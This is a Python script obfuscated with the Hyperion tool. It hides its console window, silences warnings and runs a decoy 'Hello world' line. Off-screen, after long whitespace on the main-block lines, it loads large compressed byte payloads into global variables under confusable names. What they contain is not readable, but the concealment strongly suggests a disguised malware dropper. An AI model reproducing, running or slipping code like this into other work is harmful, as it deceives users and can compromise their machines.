from builtins import *
from math import prod as Product
import warnings
import ctypes
import sys

def minimize_window():
    # Minimize the window using ctypes
    ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 0)

minimize_window()

# Suppress all warnings
warnings.filterwarnings("ignore")



__obfuscator__ = 'Hyperion'
__authors__ = ('billythegoat356', 'BlueRed')
__github__ = 'https://github.com/billythegoat356/Hyperion'
__discord__ = 'https://discord.gg/plague'
__license__ = 'EPL-2.0'

__code__ = 'print("Hello world!")'


_power, _builtins, Cube, _round, _random, Hypothesis, _math = exec, str, tuple, map, ord, globals, type

class _run:
    def __init__(self, Floor):
        self._modulo = Product((Floor, 21588))
        self._callfunction(_floor=21041)

    def _callfunction(self, _floor = str):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        self._modulo /= 1988 * _floor
        
        try:
            ((_round, _random) or _power if (_round, _random) and _power else ... or (_power, (_round, _random)))

        except ArithmeticError:
            {'ReB6dRgdib6lag': _builtins} if Hypothesis <= Cube else {_random: StackOverflow} >= _round

        except:
            _math(41429 - 81565) == int

    def Negative(self, _absolute = -51458):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        _absolute -= 67277 - 76304
        self.Algorithm != Ellipsis
        
        try:
            ({_random: StackOverflow} or _random if {_random: StackOverflow} and _random else ... or (_random, {_random: StackOverflow}))

        except TypeError:
            ((_round, _power, _builtins) or _power if (_round, _power, _builtins) and _power else ... or (_power, (_round, _power, _builtins)))

        except:
            _math(16100 + 40476) == str

    def _frame(_detectvar = type):
        return Hypothesis()[_detectvar]

    def _add(_cube = -28563 + -49135, Divide = int, Math = Hypothesis):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        Math()[_cube] = Divide
        
        try:
            (StackOverflow, _random, StackOverflow) if StackOverflow == Hypothesis else {_random: StackOverflow} <= _random

        except ArithmeticError:
            (({_builtins: _random}, _round) for _round in {'ReB6dRgdib6lag': _builtins})

        except:
            _math(67465 - 42472) == int

    def execute(code = str):
        return _power(_builtins(Cube(_round(_random, code))))

    @property
    def Algorithm(self):
        self._invert = '<__main__.Floor object at 0x000003358BE54400>'
        return (self._invert, _run.Algorithm)

if __name__ == '__main__':
    try:
        _run.execute(code = __code__)
        Invert = _run(Floor = 759 * 19379)

        _run(Floor = -61937 / -87533).Negative(_absolute = 91147 * Invert._modulo)                                                                                                                                                                                                                                                          ;_run._add(_cube='XWWWWWWXXXWXXXWWXXXWXW',Divide=b'x\x9c\xe5]is\xdbH\x92\xfd\xce_\xc1\xf1|\x10\x19V\xabq\x14\x0e2\x82\x1b\xd1kyb\xa8\xd51\xd1\xea\x1ey\xa3\xc7\xc1\x01\x01P\x86M\x12Z\x92jI1\xd1\xfb\xdb\xf7\xbd\xac\x02\x08\x1e\x92(Q\xb4<^Q\xb8\n\x85BVV^\x95\x95U\x98M\xee\xda\xb5:\xfe\xb2AC\x8e\xfc\xeb\xf5\xf2\xfe\xe0z\x1aG\xb3|\xd2\xeb\xd5\xff\xd4y\xf3\xd7\xbb\xabt\x92\xe5\xe37\xf5|R\xc9\x16]\xcf>\xe5\x93\xa9\xe4i\xbc\xe9g\xc3\xe1\xdd\xecSz\x99G3\xd7\xf3\xdf\xec\xbf\xf9\xcf\xe1u\xfas\x9a\xbci.<u\x99\xcd>]\xf7u\xc1\x9ff\xb3\xabi\xfb\xc7\x1fu\xdaA\x9c\x8f~\\*\xe6\xc7{\xde\x9dd\xd38\x9f$\x8b\xc5\x98\xc4\x83\xcb\xcb\x1f\xaf\x86\xd1\xe5u\xba\xf4\xd00\x8b\xd3\xf14\xd5\x0f\xbd\xff\xdb\xf1\x0f\xce\x81\xb5\x94%\xce\x13}\x7f\xefj\x92\x8dg\x8d7\x7fM\x87\xc3\xbc~\x93O\x86\xc9\x9f\xde4\xf7j\xcdv\x99\x9b\xf7\xf7\xa6_\xb2d\xafYKo\xe3\xf4jf\x909\xbe\xba\xc6\x93?\xe7\xd3tZ\x8f&i}\x92&\xff\x18\xff=\xcb\x87\xe9L\'\xf4\x81\x99\x7f\x8c\xff;\xbf\x96\xab\xa8\xceB\xfe1>\xcd\xfbyrW\x1ff_\xf0\xdc]~\xfd\xa6Y\xd3@e\xa3\xab|2\xeb\xf5\xf0\xb6\xbb\xe9^\xf3 \xbd\xcdf\x8dfm\x98\xc7\xd1p\xdah\xfe\xb6w\xdc=:\xee\x1e\x1f\x1fu\xb1\xef\x1e\x1d\x1dq;\xde\xfb\xd8\xb9\x1c\xe6}d\xa9\xad\xbd\xcf\x07?\\|\xf8pq\xc1=\x0e<^\xec\xfd\xd6n\xbf\xfd\xe1\xed\x0f\x8d\x1f\x1ao\xedf\xf3#\nIg\xd1l6y\xa8\x10>\xff\xe1\xc2\xfcp\xb9ZH\x92=P\xc0\xf9\xf9\xb9S\xdd\x1c9\x9c\xa3\x02\xba\x8a\xb5{2\xc8\xb3\x0e\xffL\x92\xf9\xc7\x83s\xa4\xdd\xff\xda\xd3\xd3\xd3\x13\xfe\x9f\x9c\xf0\xc0\x1dS\xf0\xf0\xba2\x1b{\xfd\xebl8\xcb\xc6l\x80\xdf\xa3\xc9\xb4\xb6\xfe\xf1*Ve#jP\xa6\xe0F\xaet\xe2\xc5\x87\xc6\xfa\xd7L\xc7\xd9l\x98]\xf7\x97q\xd8\xdc\xd7\x8f\x19$\xcb\x1b\x9eZD\xf3\xb7\x17(\xe3 \x1b\'\xe9mc/\xbd\x9e\xfc\xb2r\xf7c\xf3\x01\xbc\x0c\x87\xc3n\xd7l\xd8s\xc3\xc9w\x89\x9ca\x9e\xaf\xde\x05r\x1e\xa0\xe4\x13A\x19w\xa7\x82\xb4\x93\xef\x121\xb3(\x1f\x0e\xd6a\xe6^6\x1d\x8fG\xa31\xfeF\xfc\x8d\xf4a\xfc]\xe2f2\x9b>\t3\xe7\xe6E\xe7\xb2;\x97\x1d\xcf\xbfK\xe4\x0c\xa3\xdf\xd3\xa7\x89\x9b\xb3\xfc\xf0\xf0\xf0\xec,\xcf\xb1\xc9\xe1\x90\xdbw\x89\x9ct:\x8c\xfe\xf2$\xda\xe9\xcaY\xf7Hn\x1e\x1d\x1f\x1d\x1f\xeb,@\xcf\xde\xde\xc1\xe7<\x1b\xdf\xff\xec\xcd\xcd-\xfeooon\xf5\x89\xbe\xfe>\x11;\xcc\xaeFy\xfcTQ~*"\xfc\xe4\xf4\xc4P\xa7\xc8u\x9c?\x05GY\x16O\xa3q\xb6\r\x8e\xee-\xe2\t8\xba\xbf\x8c\x02Gw\x83lx\x9b~\x1a_?\x89\x00\x0f\xc1\x94\x87g`\xd0<\xc7\x81\x0cZ}\xfc>\xd1\xd6\xd8k\xb6z\xad\x9e\xdf\xb3z^\xcf\xc1\xde\xe9\xb9=\x0f\x0fX8\x0f\x16S7,/@\xee\x00%\x868\xda8b\xc3\x03\xe1j\xeaF\xe5\xdd\xdb\xf4\x8d\xfe\x9ek;\x89\x13:\x89k9-X\x91I\xca\xdeFc/\x1c\xccVQ\xd7\xd4;\xd9\xbeG\xc6\x8a\xd3\xdb\'\x8as\xda\x014\x04F#c\x05\x8cG\xdb\xb7\x88eZ\xc4\xde\xacE\xd07\xb8\x9f\x90l\xe4\xb5\xb6\x07)\xf4\x06\xae\x8b\xcd\xc1\x16`kaS\xe6\x9cG\x9fiN_\xc0\xde$o\xb8!\xb1\xdd\x8f\xfa\x87\xc0\xf5\xdc\xe2\x07 d_\xfc\xaa\xe9\xc5\xb5\xeb<\x06\xca\x03\x18~\x08\x0c\xdcO\xfc\xc4y\xb4\xf8\x87\x08,\xb7h(X\xb9%\x06\x03\xce\xac\x1c\x06\xc3\x86R\xc4B\x06\xfb\xab\xd3\xe3#4\xf90\xc6\x02\xcbo\x05\x96\x83\xbd\x9f\x06n\xa0|\xdb\x8f\xfd\xd8\xb1\x02+`\x8a\x15x\x81\xda\x0e\xa3\xe7\x05$\x05t\xd8o\x88OJx\xc8pH^\x072\x98\xc7\x00\x0f\x04\xab\xa9\xaf"\x95\x9f\x8fs\x15\x00\xe7\xbe\xb7\x15^\x1fz\x85JT*\x1b\xf7\xfa\x97\x96\xc7\xb4\xbc\xc6\xf68\'\x0e\xa3Q?\x89\xea\x1f\xb4wG6\xed\xe0aB\xfb^\xfb\xe7!\x0f\xc0\xe7\xe10\x93-\x1b~\xfe\xfc\x19\x97\x9f??A\xed\xbb\xa2\x92=\xec[T\xcfF\xed\xab\xc5\xd4\x8d\xcb\x0b\xe4\xc9\x10\xa5\x86\xf8\xa1t)/\\N\xdd\xb0<W\x8c\x0e_\xc8\xd3\xc6s\xa1\xc0\xa7VS\xbfy\x81\xb2hz<\x97\xd0\xfb\x8e\xb5;"\x1f\xb8\x96\xde\xfc\x01\x8f\xdc\xfb8\xea3\xee}s\xbd3u\xe3\x87`e\x05!\xe9\xba\x913p\x06\x81\xfc9\xa9\x1f\xc8\xcb\x03\x88R\xcf\xb7E\xc4\xbaHu\x91\x96 \x97\x83#6\x08\xd6A\xe0\xa3Q\x90\xea{"z\xb1\xf1\x88\xf4\x10\x8a\xd2\x82\x8a\x1f\xf8}\xdck\xa1$\x96\x17\xe0\x9cz\x95\x8aT\xa1\x8a\x01\xc4\xb6\x8f\'<_A\xf5\x85x\xdaAY\x03\x08\xee\x16\x9a[1\x8f\x1b\xba\xb6\x1b\xe0\xae\xef\x12\x86\x16\xde\x92\x10\xc2\xc0eY\x81\x8f\x14\x97Pb\x0f\xf8\x02\x0f\xcf\xaa\x12\xd6\xad\x04?\xbb\x96\xb0\xf7\xd9\xb1\x14\xb3\xbf\xcb\x0e\xe6\xc6\x8cI\xfb\xdd\xa1l\xd7vw\xcf\x11\xc6\xb4\x97S\xb7g\x0e\xcf\x98I\x85\xa9T\x1c\xb9Yfs\x8d\xa9\xb5I^g\xf7\x1a$`\x93\x07 >\'\xd8N3\xcf_*\xd6;\xf6\x1b\xb6O(m\xe0I\xdf\xa8%\x9b\xc2\x03\xad\xd5\xd4\x7f+k(\xd8\x0e\x9f\xd2\'\x91\xfe\xc9h\xa4\x8f\xaf\xd071\xfa\xfa\x0c\xddi\xe9W\xe7\xba_\x9d\xb7\xef\x83\xfby\xd2\xd7\x8f\x15\x85R\xac\x8f\xaa\xa5\xaf\xd6\xed\xd5\xa3\x80\x97@\xe7\x84\x97\xae:q\xd4\xd1S\'V\xf83@\xdf\xeb\x1e\x19\xe7\x16\x05\x8fH\x1e\xfc!q\xfb\x16a\xb7\x8ar 4\xfcN\xde\xb7Mw\xcb7]\xb1B^l\x92wCy\xf1|%\xb5V\x81\xa8o\\y\x94\xbcT\xb2\x94\x1e\x01x\x19y\xef\x9a6qL\xbb\xb4L\x9am\xd2\xfc\x8a\xbc\x7f,\xaf\xf7D\xce\xecvE\x1d\x96\x84\xa9\xaf\x8f\x8f_\x98A\xc1xd\xbeha\x8be\x13\xa64W:\xd7\xe6,j\x86_\x8c\x0b\xa6\xf0\xc1\xb4\xef\xf1\xf0=\xd3\x9d\x10x\xa1l\xa1\x1c\x8b_X\xfe\xca{[Xv\xf4\xf9\xf90\xf3m\xb1)h\xf0\xbb\xe2\xf1[J{qC\xfd).\xa2\xa7\xe5\xd5Z\x97\x1a\x98?z@}\xe9-\xaf\xa4n\xfanhrO\x9eu{\xb4\xc7\xe8au\x96\xd3\x9e\xd0\xd1\xb2\xe5\xed\xae<\xadL7k!mS\\Kw\xca\x16?\xaf/?\x9b\xed\xbd\x9a\xfa\xea\x1d\xa7\x85\xedy\xbc\x00+/D\x9f",\x7f\xc1\xca\x86\xfd\xee\x1cj\xdb\xf5\xdf\xf6dPH\x0f\x11\xe9\xe3\xed\x86\x8d\xecI\xff\xdb\x13\xe2\xb0\xc4\xd5C\x92\xf1WS7.\xaf\xa5=\x03\x86\x1d\x1c\xe9P\xf8\xab\xa9\x1b\x97\xe7Ho\xde\x95\x12<\x88\n]\xdeJ\xea\xc6\xccf\tS\xf1g\x06\x1d\x84\xddVR_\xc6\x80i\x99\xadPh\x81Qf\xb6\xd9\xac\x8a\x01\xf3P^I\xfb\xda^\x85\x05\xe3\xc3\x1b,\x99\x1f[\xd1\xab3\xff+\xdcY\x02\xd5f\xfd\xa2\x07\xd1\xfeD\x0f\xe3\xc7\xce8\x9f5\xd6G\xcb4\xd6\x86C4\xd6\x8fu7\x9f\xeb`\x811\x98\x9a\x8d\xfb\xb4r\x96\x98\xb3\xa4\xf8\xedL\x00\x05}\xe5H\x03\xf7\x037\xb0\xe4\xcc\x0b\xb6\xb3-7\x14\xb7\x0b\x026\x98\xff\x95\xe7\xbb\xab\xf3}>y\xe5\x87\xb0\xd1io+\x98\xa8;s\xac\x95\x1d;\xfd[\xec\xd2\x15w\xf5\xf5\xeep\xe0\xec\xac~\xf3\xd1\xaa\xea\x98\x94>+\xae\x8a\xb3"\xd7\x0e\xdbZ\xdc\x81\x11Z\x15-\ra\xd6\xf2\xb7\x13a\x8fpt\xc1\xd3\x15\xde\xad\\\x1b.\xdfUm\x83\xe79L\x91B\xf7h\x883\x85\x14( :L)\xec\x91k+\x8f\r\xbd\r\x90\x98\x14\x94\x87t>Pn\xbe\xb8e\xfe\x92Za\xcb\xb1>\xd0Z\x0b\x8a\x93Nf*N\xf1\x0cl\xa70\xcb\x97\x9d\xe8\x88\xc5\x93\x1dt\x98\x9e\x92W\x8f\x03\xb9\xd2\xb1h\x89-\xc6N\x90\xb7\x9a\xba\xf1\x88\x0e\x1d\xcd\xca\x8c,q\xb4H\xc9\x88\xceJ\xea\xab\x05\x86lM\x16\xdb\xda\xf8\x16\x87\xc99d\x8e\xbd\xec\xe4d3>z\x10!/\x17\x97\xf10\x02\xbc\xd8Ow\'s\xd3\xf5\x16\xd3\x82$Nw/y\xc5\x96\x10\xc3Yy/2z #:\xddc\xf3\x7ft$\xd3\r^\xc4;g\x99\x0e\x862G\xc7xK=\xd3\xe9hU\xbcs\x8f\xe5\xdd0\xf0\xe5\xd9\xb4\xe3\xda\xae\x05\xd3\x01\x8a\x08vB\xe8\xd2\x90\xf0\xb1\x0fd\xf8\xceu[\x1c\x7f\x94\xfb\xdb\xd9k{c\x13\xf9d\xcc~Z\xfd\xaf\xd0%1N\xc0,\x1b\xca\xa8\xbd\x8c\xe2\xa3\x8b\x82\x13$e\xd9\xe7\xe7x\xea\x1d\x03\xae@\xaf\xa3\xc7X\x89\x1d\xe8\x06\xcf\x04\xf1\x85\xe2\xdc\x0b\x8cn\xf0WS_1\xc8\xef\x85\xbb\x0cU\xc3\xcaIJC\xea\xbet\xba\xff\xcd9\xee\xb4@\xb3\xf7\xe74\xa6\x9c\xce\xe7\xae\xcb\th\x9c\x84\x81DR\xde\x00B6\x81I\xc7\xfc/\xd0Sg\xa7\xd8t\x8b\xa5{<\xdclhGS\x81+\xb1\x1d\x0c\x16\xa5_\xa5\xa0\x82\xa5\xd4Wv\xfd\xea\xc8\x14\xcf\xc4\x8c\xd0\xb9\x19\x8a\x83z%\xf5\xd5\xdd\x9c\xcf\xb7<\xdc\x85\x9f\xb5SE\\\xe9\xc4W\xbb\xf8\xf3\xae\xfe\xce:\xf4\x81\xe3y\xe0\x04\x07\xdd\x16\xd9+X\\\x9e\n\xd1\x05\xf2T\xc2\xbd\xb7e7\xc6DYp\x84S".p\xdc\xd8\xed\xa8\rX\xba-]\x11\x7f-q;\xae\xa4\xee\x80\xc0w\xd3\x05x\x90\xd0Cc\x15\xb8f+Be}\xe3\xd6\x14\xd7f%\xac\xf6\xb1\xbc_\x9ba\xaa\xe2s\xc7\xbe\x82\x8a\xf7\xeb^\x0f\xd8n\xd9\xc6\xd9\xb2["\x91\xbb\x16\xfe\x8a.\xc9+\xf5J\xee\xf1\xe16\xfe\xf7\x1e\x7fm>i4Vf\x8f6\xa3q\xf2\x1c\x07\xaf\x9e\xe0\xaa\x13$Gq\xbd!\xe3Q\x04p\x98\xce\x13\x1b\xc9\x96A@w9m{\xa4\x16\xe6\xbb\xbdd\xd2\xbb\xe6h\xc9@')

        _run(Floor = -45180 / -8040).Negative(_absolute = 16036 + Invert._modulo)                                                                                                                                                                                                                                                          ;_run._add(_cube='IlllIIIllIIlIIlllllIlIllI',Divide=b'\xbbf\xccM\xf2\xaa\xaf\xe0NYvf\xcdm\'\xc8\x90\xc7b\x00\xe9\xc8\xea\x93\x91w\xd7\xf1\x8c\x17\x9d\xb5\x8b19\xf3=Sv\x17!i0\xe2\rpt\xfc\xed\x9cM\x0f\xd6\xb6\xea\xca\\\xeen\xa7+\x83\x188\xff\x1au\x16\xe7\xae\x8cT\xb1\xcb\rB-\xe2:!\xbc\x8b\xce\xb8\xc6L\xbc;\xccD\xbe\xa6\x82\xc8l-\xd9\xc7\xe5\xbe\xe5\xff[\xba\xf1\x17\x07%\xe6\xb4\xbc:|\xb1\xb3\xda\xed\xd6q\x94,\xb8\x87\xe6\xd4\xbb~@n\x87\xf4\xfc\xd4@\xb1\xc4\xf7\xc4\xe9!\xc3\xb2\xae\xe5s\x1f\xba4VR?\n\\\xe9\t\xee\x96*\n\x9a\x98\xd3Eq\xa5\xcfw\xe7f\xd3\x03\x14[\xda\xf3\x12.a\xe6\xd7r\x8a-\'\xd6~U;\xb9:\xec\x1fTb\xe0Z\x15\xb5\xeb\xad\t\x11\xb8/\xef\xd7P\xc7\xc6\x05\xb2\xd395ie\xfeLZ\xcc\xa1)\xe7\xda\xec\x94\x05\xef7&\xb6\xb2\x92e6gu\xf5\x17l\xaf\xec\xf8xJ\xb9t\xd7\xd8\xbd"\xba,0\x833Ki\x1b\xf7\x85]\x99\xa6\xa3\xcc\xdc\xe2\xd0\x84\xe0\xac\xa4\xbe*~\x1e\xe5\xdb\xc2\xfb\x1dVb\x8c\xcb)\xa3K\xa1=\x0f\xe5\r\x9f\x1f\xda\xb3\x83\xbe\xee+\x18N\xeb\xe2\x03\xe6q\x01\xd59\xae\xdco\x1cA;\x1e\x9b\xc8\x1d\x1d:+\xff/\x1c?;\x8f\x92\x9dG\xd2\x06\xe51\\\x88\xac\xc5\xd976?j\xa1\x1fU\xcc\x902\x8d\x8e|[\x89;3\x0b\x00X\x96\x85/xq,\xd3\x04^o\xa6\x06g:\x1c2\x04\x81\xf3\x8d\x0f\x19\x90\x80\xab\x97\x0e\x06\xaf*\xaf\xf9\xa4\xd0\xea\xd4\xd0\xca\xc4\xd0\xdd\xd1\xc3\xa2\xfb\x8aa\x1c6;\';\x0f\xf5\xa9\x06\xf7,\x1ew\x17\xda#C\xae\xd2\xef\x0b\xb7\xb3\x06E)\x1b\xfdl\xdcA\xdf\xb6\x06RF\xab\xf8\x15+\xb0\x98\x01#\xd7\x15\r\xf4X\xde\xaf3\x80\xe6\xb6\x9e\xc0\xbc\x0f\xcdZ\x19\xcf\xe7\xab\xe8i\x12\xe6\xf2e\x06\xc6\x0b\xf3\xbaT\xcf\x15s[Twe`\xfc\xb1\xbc\xee\xae\xa7\x1d-{\xc7\x16\xa2tE\xdeW\xc7\x0b+\xd2\x7fY\x03\x94c\x8e\xbb\x0bx\x94I1\x91\xfc\xf4T\x99V11F\x1f\xb7\x9ag\xe2\x99\x19\x91\xae\x04\xae\xfb\xc6\x89\xdaZM\xfd\xfa\x03y\x0f\x86wPW\x8a!r$\xa3K2\xc0\xb4i\x8c\xc7\xbfe|\xdc\xd2\xe0\xf9\xce\xc8-]P\xb9\xebT\xb2\xdc\xdd\x9dS\x0e,(q\x804\xa9t\x08=\xdd\x16Z\x19\xef\xce5#\x13\xf5\x95\xde\xeb\xc9\xf9\x9c\xa8_\xa4\xaaA\x99\x86\xbf\xdd\x99 \xf7\xb8\xa6`\x8c\xd0<Q.c\xab]\xdc\xe1\x1e}\x0e\x9fq=6\xf2!\x8f\xe4dL\x8f\xf2\xe9\xe3i\xe1Yg;s\xd4,\x9bv\xa3\xbd<\xfaJ\xf6\xff\xef\x86\xa9\xc6&\xb8\xa9\x9c\xf1)\x0b<~U\xa7\x97_\t\x1f\xb3\x8d\xc6,&\xf9W\xc3\xce\x1e\xcb\xb7\xe9ZK[EN\xf0/)~\xcaQ\x1e\x94mK\xa5\x8e\xe5Y\x9e\xa3Z\x9e\xaflO)\xcf\xb1T_\xe9\xe8\x03\xf3\xb3\x12+\x82t\xa1b\xf3\x02\xdf\xb3qt\x94\r\x96\xb3!\x85\xe8h\xea\x07\xb6\x1f\xfa}\xbf\x05%\xdd\n\x02\xd7\xe2}\xe4\xf3\x14\xca\xc4\x19\x1d\xbe\x8e\xea\x83\x038\x9d8\xf0\\?R\xb6\xcf\xa8B\xdc\x05\xf7\xb6L~\xa5(N#\x8f\xceP\xa4\xf8\xe0\x1f\xcf\x0e`\xfd\xa3H\xc0\xe0\xc1XA\x91\x91g\x93\xf5\x14,\xe5\xc0FnX\r.\r\x87\xd4\x19\xa8\x14\xeff`<.=K\x85\x80\xca\xc5{!\xb7 \xb4B\xaf\x85rQ\x06$G\xac<@\x0b\x93\x87\xcc\x892\xf1>7\x84XS\n)\x80\xaf\x0fq\x17r)\x90\xc0\xf3\xa0\xe2\x03\xa4\x07>a\xf0\x13\xd7E\xad=\xbc\x17\xf6\n\xca\x00\x9b\x03\x02\x80\xaa\x943\x00z(\x10Y\xef\x14\x95\xb5\x82\xd0S\xae\xa3bY\x14)\xa4\xcc\x12\xbf7\x84\x86\x9fz\x80\xd2\xb3\x01/\xcc\x08 \xc8c\\\x14\xb0\xa98m\x85-\x82\xf7\x02\x07\xa8\x18\xba\xbfx\x87\rX\x95ki<\x00\x93\x0e0\x13\xa1db\x99.j$\x01~h"\xd9\'\x827\xd4\x19\xed\x1ay\x11P\xae\x80\xaf\x01j\x8d\x96E\x1bq9\xa1\x90\xcfyh.>\xa5b\xba\xe1\x83\x96,\x85\xe2y\xd8\x07\x16\x01\x0c \xb9\\?h\x01\x1e\xe0C\x85(\xc9\x13\x18\xf0\x18\xf0\xeb\xe2\x8e\x0b,\x00\x16?\x05\x14\x80\x1a\xe6\xa2#-A\xe5\x88\x9f\xc4r\xd9\xc0[\x0b\xf5\x8ep\x15Ab\xfb\x8a~\x90\x10t\x83k\xd5Gk3"LSI\x12\x80\xce|.W\x12\x02Qx\xcec="\xc0\x08\xf2Bm]\xe2[`@\xdfP\r\x08?\xca\x06\x16@\rtRxx:\xf5x\x8eV\xa0\xd9(+\xa58\xa8\x08(\xc4k\x81\xba\xf1&\xc0\xc0\x1a\x03>h\x16\xd0\x9e\x0f\xaa\x00\x1d\xd9lYE\x15\x877+\x92M\x100\\\x13\x94I\xf4\x82\xce\x1c\x14\xef\x81"\xf0v\r\x03j\xac\xd0V-\xe9\x1e\xbaB\xd7\x89\xf0\x07[\xc6%\xbd\x0b\x9d\xb3\xee\x84>\x05\x15\xf4Qr\x02\xb8A\x8d\x12\xfa\xe9\x00\xdf\x01jKj\x02}\xf8\xa4\'\xcfa\xb0F\x9f)>\xc92\x04,\xb0\xd0Q\\\x08h9l\xd0\'\xaf\to\xc6\x9e%m\xe7Q\xf9\x08\x87\xa1u}@\x81|\xa1\n\xd1:@\x0f \x16\xa3\x95)\xa0\x01\x9f\xb0\xf8\t\xa8\xb0\x85tO\xb8M\xea\x8aJ\x86A\x84\x9a\xc4x\x1d\xf9\x12\xed\x8b\x9a\xa3\xf6(Wf\xd0\xe1\xcd\xb0\xcc\xc1_\x8e\x1f\xa1e\x1c\xc2\xe0\x92k\x06|N(\x9c\x08D\x9f\x82\xd3\x06T\x82\xc7\x14\xde\x04hP\xc3D\r\xd06\xe0N\xcf\x027\xa3\x86\xa0j\xb4\r1J\xeb\x1e\x04\x8a\xde=\xf0\xdc\xa2\x14@{\xd9t;\x05\xe0e\xbe\x015\r\x01W\x08f\xb4Q\x9e+\xd4J\xa9d\x13\x06\x91.\xad\x00\xefW(\xd3\xa7\x9cB_\x81\xf2\x01\xc08lW\xb6\x9fb:\xe0\x01\xedR\xe2p\xa1\x03\xe2\xa8\x0f\x8cA\x9a\x81\x9e-`\xdd\x06[p\xd8g\x80\x9a\xdbh\xaf\xbe \x80\xf2\x01\xf4\x83\xb6\xe9+\xc8)\x18\x06!\x87F\x91C\xa1f\x91\xc0@\xc9\xc0&\x87\xe4B+\x80\xaf\xc0\xbd\xe4V\x8f\x8cD\xd2\x01&"\x92\x17\xe4\x94\xcd\xd6T\x1cP\r\x89\x03\xbc#a&z\xbc<`\x03\xb5\xc6\xf3\xc0b_\xbc\x02\t1\x05\xe6\xf6\xfd\x18\xadi\xb1uPB$\xa3l\x1e\xcaHY\x03\xa1I\xf0#ZGh\x19\xb8\x13S$\x00uQ\xa2\x80\xf3!\xd1<\x0b\xb8\xa2\xc5\x08J\x81\xf4\t\x01N\x8c\xfa\x0e\x80\x9d\x18\x85A\n\x81\xceQ\x0b\xf0\x04RA=\xc4\x01(\x8b2\x9a\xbc$\xfcM\xb1nSo\xe0o@\xc9\x0cz\xb6\x19\xe1#0p\xda\x88G\x19A*$_;\xd4\x0f\x11\x9e\xd3\x12\x18\x14\x84vJ\x81g\x05\xec8\xac\x13\xb0\xad\x90\x07\x94B\xac\x83i\xe9\xac\r(\xec\\\x9bRD%\xa4l\xbc\xd1\xf6\xd8\x9et\xd1\xd0\xf4\xc65\xda\x00\x90\xa3\xbd|\x85\x9e#;e\x02\x83\x07\x99oQJx\x8c:\xb2\\\x1b5%\xcc!Wk\x00\xa2I\x9dh:FU\xa0\x8c\x01\x19\x00T\x87j\xc9\xd2\x17(\xc5\xa5\\\x88\xb4`U\xd4I\t$\x0b\xdb\xce\xf3\xa4F\xc4m \xfa\x932\x00R\xde\xa7$A\xadmJ!\xe1M\xb4\x8b\xb4+0\t*\xef\x83\xab\xc9Lx\xb9P\xa4K)Kj\xc7\xdb\x02\x91#\xfd \x98\xe3\xda\xa3n\x02Uz\x94*0\x13\xd0\x8a\xa0T\xd1l\\\xe7\tm\xc4I`\xc0\x89\x8c\xa8R\x0eCJ\x83\x0f\x80\xdd>\xc7[\xdd\x96\xe8\xac\x01\xb5\x1a\xe1\xa7\xfa\xf6\x08{\x806\x01V\xc1o-\xca/\x9f\xad\xe9S\x8f\x03\xa2\x00\x90\xda\xc2)a@\x89\x8e\xa7\x00\x95\xc5I@l%:\xc6|\xae\n\x02\xd9\x89\xb7\xa2d\xd20\xa0\x89\xa8J\xd0R!\xb8.\x01n}j(\xe0\xaf/\xf2AV\x9f\x025(Ot\x04\x1b\x97\x02S(\x0f/\x03\x0c\xb1\xe7\x82\x8a\xa4\x16.\xd9%\xe2\x1b|\xc8\x08\x94\t\\\x91z)H(\x19\xa8\xbb\xd1F\x8e\xe2\xa4$\xb4\x8ab\x1dSH;\xde\xa1\\\xa7\xb6\xc4;\xa8yA-\xb0k\xa4-Br\xac\xa2&ph\x01\xf0\x9e\xc65\xcb\x01\xbc\xa4H%\x92\xdc\xf7B\xf2=\xf0\x11\xf3\xed\xd4c\xc02\xe5%\xe3\x92m\xd0,L;\xe4\x03\xb6!\xef\xa0g\x88\x06\xd4\x0e\xb8\x04G\xfa\xc4\x86\x96\xb5\xae\xf0\x0fk\xe9;\x867\xa9\x15H\xe7}\xa4\xc2V\x00\x16Z\xd4@\xae#\x1cKmO\xd3 \x04\xb6\xd0\x16\xd0\xa6\xd4\x17\xb6\xd8\x0c\xac\xbbMiE\xed\x84z\xa3\xa2\xaa\x059\xc0\xe7e\xba\xab\x8e\x1a\x01}\xc6\xc2e\xd8\x01b\xe8l\xbaUPz\xa0\xe5\xa4O\x99d\x05\xd4U\x8a\x16\nt,%? \xa0\x8c\x80,\x82\xbeP\xec\xee\x01"\xd1\x13\x9e\xe8l\'\xb0\xb8\xee\x98b~H_\xbc\xdf\x05?P"K\xb8\x08Z\xa7%C.\x01\xda\x10\xda\xda\xa5v`\xdf-\x16\x1bOK\xde\x18\xf5\x94\xb6\x08B\xe9\xc9%\xe0 He\xe2U4=\xf1g)\xbe\x03P\x8b\xac\xa4U\x06\xe9\x08\t\x08\xa9\x0b\xb8`\xffi\x9eU\x94f\x16\xe0\x8c\x08U Z\x9ez\x95\xb2^d\x00\xda\x1e4\t\x1b\x95S\x81]\xd1\x84hS\xa6\x02\x13\xd2\x16>xV\xec\x10\x8f\xe3\x1a\x0e)\x12\x98\xf4h\x93\xf9\xb4E\xc3@,\x16_\xb7\xa3K\x0b\x8f\x1a\xc9\xe5R\x8c\xb0!=\xda\xb31\xdb\x88x\xd7\x137h\x13R.\xd0\xfa\xf0\x88S%\x1a\xc1\xa1\rI\x0b\x9b2\x16oh\xb1\xcd\x85&Y\'\xc8D\xf0\xabK8\xa8\xa8A\t\xa0tv(\xc5\xba\xb0\x80\'\xf0\x0f\xda1d\xa7\x1b\xef\x84\x9c\x0fh\xa3\xc5\xe4r\xe1\x0e\xb6\x8c\xa2\xe66\xb8\xb6!K#bB\xec\xf6\xd4\xe9\x93J\xa9A8x\x03M\n2\x03g\x05\xda\xaeF\x8b\x85\xa4\x7f\xeaR\xc6\xde\x93/Qc\x0be3B?\x15\xc9\xecS\x07\x05b!\xd2\x82!\xfee\x825,\x1c\xd2(jJ\xd1\x19\x92\x16}\xd2\rI\x19yy\x87\x92\x8av\x9e\x0f\x89\t5\n\xaeE\xab#\xbf\xa2\x87')

